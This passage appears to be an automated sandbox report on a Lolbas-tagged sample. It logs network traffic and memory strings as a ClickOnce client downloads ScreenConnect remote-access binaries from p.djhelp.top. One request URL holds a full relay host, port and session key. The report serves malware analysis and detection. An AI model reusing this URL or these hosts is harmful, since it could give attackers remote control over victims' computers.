                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=variols.ephelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQBN%2fsDy6XX2LDmcpyEoKK55JwThlRr7YHNGe39snOuHFtnjCyK72cZJH78V0V1YAf3iHC4VrBqpgJlkVuiU31AA%2fvSAfza7nhZjCa5ykV2NAakmwwsZZcF4P1vkpVkI7ANPAC%2bVyPuI2q4BXqVaSlq5q6E2QfxXeftcqNGKOU7f6LwNITHSyFLXqkb6omGbacpFoHOXIhxtO51vc7VoYDnePo%2bPLojTyIgk0TnsKSl3v5MmaDGdZnaRO%2fgpfn0w%2fd8d4r7vK%2b35r8AOTYEvrTtJo%2bk50eZpwyQ3Wb4JzVjk4643SyQu2kEB3raxmEp6Lu%2bCnvj%2fq6inamW4uCChS0u0&r=&i= HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficDNS traffic detected: DNS query: p.djhelp.top
                  Source: global trafficDNS traffic detected: DNS query: variols.ephelp.site
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280250000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe, 00000000.00000002.1577318421.000000000161B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280240000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280618000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: F2E248BEDDBB2D85122423C41028BFD40.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe, 00000000.00000002.1577318421.000000000161B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.cu
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: dfsvc.exe, 00000001.00000002.2719548418.000002729B640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en$
                  Source: dfsvc.exe, 00000001.00000002.2719548418.000002729B623000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe, 00000000.00000002.1577318421.000000000161B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.$
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000001.00000002.2724880661.00000272FF67C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000001.00000002.2719548418.000002729B560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crlu
                  Source: dfsvc.exe, 00000001.00000002.2709412544.000002728001A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496898405.000000000270A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496898405.0000000002A29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: dfsvc.exe, 00000001.00000002.2709412544.00000272803F8000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.000002728041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000001.00000002.2709412544.000002728043F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.00000272804B4000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.000002728031A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.000002728041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280090000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280090000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: ScreenConnect.Core.dll0.1.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: dfsvc.exe, 00000001.00000002.2709412544.000002728031A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.dj
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280522000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280687000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280819000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.djheH
                  Source: dfsvc.exe, 00000001.00000002.2709412544.000002728079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.djheH2
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.djheHB
                  Source: dfsvc.exe, 00000001.00000002.2709412544.000002728062C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.djheHJ
                  Source: dfsvc.exe, 00000001.00000002.2709412544.000002728062C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.djheHR
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280522000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.000002728001A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.000002728079C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280700000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280819000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top
                  Source: ScreenConnect.WindowsClient.exe, 00000004.00000002.1496024015.00000000008EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/Scr
                  Source: dfsvc.exe, 00000001.00000002.2709412544.000002728079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect
                  Source: dfsvc.exe, 00000001.00000002.2718694551.0000027299040000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.000002728031A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2720941226.000002729B722000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2719548418.000002729B560000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2719548418.000002729B601000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496898405.0000000002701000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1499465518.000000001B013000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496898405.000000000270A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.application
                  Source: ScreenConnect.WindowsClient.exe, 00000004.00000002.1499746490.000000001B0AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.application#Sch#
                  Source: ScreenConnect.WindowsClient.exe, 00000004.00000002.1496024015.0000000000901000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496898405.000000000270A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1500314826.000000001B9C0000.00000004.00000020.00020000.00000000.sdmp, ZCFG7Y8H.log.1.drString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application
                  Source: dfsvc.exe, 00000001.00000002.2719548418.000002729B5B9000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2719548418.000002729B560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.application%%%
                  Source: dfsvc.exe, 00000001.00000002.2719548418.000002729B560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.application%BE-
                  Source: dfsvc.exe, 00000001.00000002.2720941226.000002729B722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.application6cls_0
                  Source: dfsvc.exe, 00000001.00000002.2720941226.000002729B722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.application7a5c561934e089
                  Source: dfsvc.exe, 00000001.00000002.2720941226.000002729B722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.application8de=msil
                  Source: dfsvc.exe, 00000001.00000002.2720941226.000002729B722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.application=msil61934e089
                  Source: ZCFG7Y8H.log.1.drString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=variols.ephelp.site&p=
                  Source: dfsvc.exe, 00000001.00000002.2719548418.000002729B5E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.applicationApps
                  Source: ScreenConnect.WindowsClient.exe, 00000004.00000002.1499465518.000000001B013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.applicationApps_9
                  Source: dfsvc.exe, 00000001.00000002.2719548418.000002729B5E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.applicationApps_et
                  Source: ScreenConnect.WindowsClient.exe, 00000004.00000002.1496024015.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.applicationC
                  Source: ScreenConnect.WindowsClient.exe, 00000004.00000002.1496024015.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.applicationa5c561934e089
                  Source: ScreenConnect.WindowsClient.exe, 00000004.00000002.1496024015.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.applicatione?
                  Source: ScreenConnect.WindowsClient.exe, 00000004.00000002.1499465518.000000001B013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.applicationf94db01
                  Source: ScreenConnect.WindowsClient.exe, 00000004.00000002.1496024015.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.applications
                  Source: dfsvc.exe, 00000001.00000002.2720941226.000002729B722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.applications_
                  Source: dfsvc.exe, 00000001.00000002.2720941226.000002729B722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.applicationsil
                  Source: dfsvc.exe, 00000001.00000002.2718694551.0000027299040000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.00000272801F7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280522000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.dll
                  Source: dfsvc.exe, 00000001.00000002.2709412544.000002728031A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2719548418.000002729B560000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280090000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496898405.000000000270A000.00000004.00000800.00020000.00000000.sdmp, ZCFG7Y8H.log.1.drString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000001.00000002.2719548418.000002729B560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Client.manifest&pU-K
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280522000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.ClientServi
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000001.00000002.2709412544.000002728062C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2724880661.00000272FF63A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280819000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000001.00000002.2718694551.0000027299040000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Core.dllv
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Win
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000001.00000002.2709412544.000002728062C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.WindowsBackstageShe
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.WindowsBackstageShell.e
                  Source: dfsvc.exe, 00000001.00000002.2709412544.000002728062C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2720941226.000002729B722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280693000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2720941226.000002729B722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2720941226.000002729B722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exeP
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280819000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.WindowsClie
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.WindowsClient.e
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280819000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2720941226.000002729B722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280693000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2720941226.000002729B722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2720941226.000002729B722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.WindowsClient.exe.config2
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.WindowsFileMana
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280693000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2720941226.000002729B722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000001.00000002.2709412544.000002728062C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.WindowsFileManager.exe.0
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280687000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2720941226.000002729B722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://p.djhelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                  Source: unknownHTTPS traffic detected: 172.67.152.68:443 -> 192.168.2.8:49683 version: TLS 1.2
